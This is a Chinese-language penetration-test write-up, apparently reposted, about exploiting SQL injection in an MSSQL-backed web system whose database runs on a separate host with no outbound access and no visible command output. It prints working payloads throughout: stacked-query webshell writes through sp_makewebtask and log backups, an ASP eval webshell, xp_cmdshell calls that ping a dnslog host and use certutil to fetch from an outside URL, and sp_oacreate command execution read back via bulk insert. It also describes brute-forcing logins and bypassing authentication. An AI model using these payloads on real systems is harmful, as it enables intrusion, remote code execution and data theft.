实战 | 记一次无回显不出网站库分离的渗透测试

VSole2022-06-07 21:12:21

某日接到一个项目,只给了一个二维码。

1、数据管理系统

扫描二维码后在页面下方得到该公司的名字,百度搜索该公司的名字,找到一个数据中心。

访问该页面后发现存在用户名遍历,使用Burp爆破"常见用户名Top500"得到三个账号,并成功爆出其中一个账号的密码。

登陆后发现大都是一些信息管理的功能,没有发现可利用的点。

可能是没有管理员账号,所以功能较少,这种后台感觉拿到管理员账号也有点悬,先看其他的。

2、旁站

2.1 登陆后台

在Fofa搜索该IP找到另一个站点,是该公司的其他系统。

该页面的账号是自动填充,输入密码点击登陆会报500。

可能是密码错误的返回页面?一边爆破密码一遍测其他漏洞。

在输入登陆密码的时候加入单引号,出现了SQL报错,经过测试存在Sql注入。

现在的思路是进入后台测试是否可以Getshell、通过Sql注入进行Getshell。

使用万能密码进入后台,提示是游客权限,也没有什么利用点,准备获取管理员账号密码。

得到登陆后台账号密码后,输入正确密码也会报500,很奇怪。

放下后台Getshell的思路,尝试Sql注入Getshell。

2.2 Mssql注入Get WebShell

经过简单的信息收集,得到该系统的信息 mssql 2012 dbo权限 win6.2

常见的Getshell方法有写Webshell、通过扩展执行命令。打算先写Webshell,以免开启扩展执行命令过程中被杀软拦截打草惊蛇。

Mssql常用的写Webshell方法"差异备份、Log备份、sp_makewebtask"等,写webshell的之前可以先写一个正常文件,来确认可以写入。

2.2.1 sp_makewebtask写Shell

权限:dbo、sa 且对写入的路径有写权限

条件:存在sp_makewebtask扩展

大致思路是创建一个表,将十六进制的Webshell插入表中,使用sp_makewebtask导出表中的数据到指定文件。


';create table cmd (a image)--';insert into cmd(a) values(0x616263)-- #webshell的16进制';execute sp_makewebtask @outputfile='D:\test\1.txt','@query='select a from cmd'--';drop table cmd--

在网上看到可以使用一条语句来完成,不过没有测试,因为该服务器不存在sp_makewebtask扩展....


exec sp_makewebtask 'c:\www\testwr.asp','select''<%execute(request("zz"))%>'' '

2.2.2 Log备份

在两个备份Getshell方法中,先试Log备份。Log备份只备份操作日志,相对来说导出的文件较小。


;alter database 数据库名称 set RECOVERY FULL -- #将数据库设置为完整模式,完整模式会记录所有操作日志,支持备份日志。;create table cmd (a image) --;backup log db_name to disk = 'E:\test\test.aspx' with init -- #备份db_name数据库的日志到指定文件头部;insert into cmd (a) values ('hex_webshell')-- ;backup log 数据库名称 to disk = 'E:\test\test.aspx' --

Sql报错泄露了绝对路径,省去找路径的麻烦。语句执行过程中,一直提示找不到指定路径。

先尝试往C盘写文件,测试是否有写入权限。执行完后没报错,说明写进去了,不是权限问题。

在这想了半天,突然想起来在信息收集的时候没有测该站点是否为站库分离!

啊这.....

@@servername > 0

select host_name > 0

先暂时放弃通过写Webshell来Getshell了。如果数据库在外网的话,它所在的服务器没有搭建web服务,写了也没法访问,访问到了也不一定解析,何况数据库的IP都没有...

2.3 执行命令

2.3.1 判断扩展是否存在

使用扩展执行命令前一般先判断该扩展是否存在,Bool型判断语句在这不适用,无论返回的是True还是False都会报错。

执行为true

把xp_cmdshell改成不存在扩展还是会报错

可能就是xp_cmdshell不存在,但在之后又尝试了几个扩展,都返回统一报错页面。

可以使用时间盲注判断。

';if(select count(*) from master.dbo.sysobjects where xtype ='x' and name = 'xp_cmdshell')=1 waitfor delay '0:0:5'--

如果有报错回显的话,也可以通过执行该扩展判断。

2.3.2 xp_cmdshell

mssql中最常见的执行命令扩展,05版本以后默认关闭。

之前已经判断xp_cmdshell存在,将其开启后先判断该扩展是否可以正常执行命令。

这里使用ping判断该命令是否成功执行,但执行完会一直卡在那。dnslog也没有回显,之后又尝试了http、dns协议也都没有回显。


;exec master..xp_cmdshell 'ping xxx.dnslog.cn';exec master..xp_cmdshell 'certutil -urlcache -f -split http://xxx/';exec master..xp_cmdshell 'nslookup xxx.dnslog.cn'

以前遇到过这种情况,是被杀软拦截了,于是乎先pass。

2.3.3 sp_oacreate

使用sp_oacreate执行命令,缺点是没有回显。延续xp_cmdshell的思路,先通过测试是否出网来确定命令是否成功执行。测试完发现和xp_cmdshell的结果一样,平台都接收不到请求。

这时我怀疑不是杀软的问题,可能是数据库服务器不出网?

为了验证该想法,改用另一种方式来判断。思路是执行命令并将执行结果写入本地文件,然后使用Bulk insert将命令回显读取到数据库,最后通过Sql查询就可以获取到命令执行结果。

执行命令保将执行结果写入文件


;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c whoami  > c:\\1.txt';

 

将命令执行结果导入表

 

create table testa(line text);bulk insert testa from 'c:\\1.txt' with (fieldterminator='n',ROWTERMINATOR='nn');--

查询表中内容(命令执行结果)

and 1=(select top 1 * from 数据库名..testa  FOR XML PATH(''))--

最后进行痕迹清理,将该表、存储执行命令回显的文件删除。

整合这几步操作

 

通过读取到的命令回显,印证了之前的想法。

2.3 遇到的问题

2.3.1 无法进行大容量加载

如果没杀软出现这种情况,可能因为命令还没执行完,等等就好了。

2.3.1 将被二进制截断

这个问题我也没解决,百度得到的结果是字段长度问题,不过我改了没成功。

可以配合findstr过滤想要的内容

3、后记

后续测试xp_cmdshell其实也可以执行命令,不过也是没回显,思路和sp_oacreate一样。

做完这些一看时间已经下午四点了,回想起上一次看到今天早上的阳光,还是在今天早上。

版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权,烦请告知,我们会立即删除并致歉!

命令模式渗透测试
本作品采用《CC 协议》,转载必须注明作者和本文链接
域内横向移动技术就是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他 域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。
Nmap渗透测试指南
2022-04-20 13:05:55
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG E:\ip\result3.txt -iL E:\ip\ip.txt
Fpicker是一款基于Frida的模糊测试套件,可以帮助广大研究人员以多种模式来进行渗透测试,例如AFL++模式或被动追踪模式等。值得一提的是,该工具可以在所有支持Firda的系统平台上运行。
九种DC靶机渗透测试
2023-01-07 11:14:37
点击上方蓝字 关注安全知识DC-1靶机测试1.DC-1靶机安装安装进去后,修改网络设置为nat模式2.靶机
常见渗透测试靶场
2022-05-12 06:47:27
作为新手,通常第一个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。 1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(Command Injection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(Insecure CAPT
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
信息搜集先来看看目标站点的各种信息后端PHP,前端使用layui,路由URL规则看起来像ThinkPHP,那自然想到的是ThinkPHP那些年爆发的命令执行了,准备一把梭!然而,尝试了一番,并没有历史漏洞。0x02 常见漏洞利用宝塔和FastAdmin,首先FastAdmin印证了是ThinkPHP的猜测,有宝塔可以尝试利用宝塔的phpmyAdmin未授权访问漏洞进行利用。另外由于各个站点之间没有隔离,旁站的shell和目标站点的shell没有差别,无需继续,至此渗透结束。
概述在学习SQL注入之前,我们应先了解什么是SQL?原理SQL注入就是当开发人员对用户输入数据的合法性没有判断或过滤不严时,攻击者通过拼接恶意SQL语句诱使解释器在未经适当授权的情况下执行意外命令或访问数据。
VSole
网络安全专家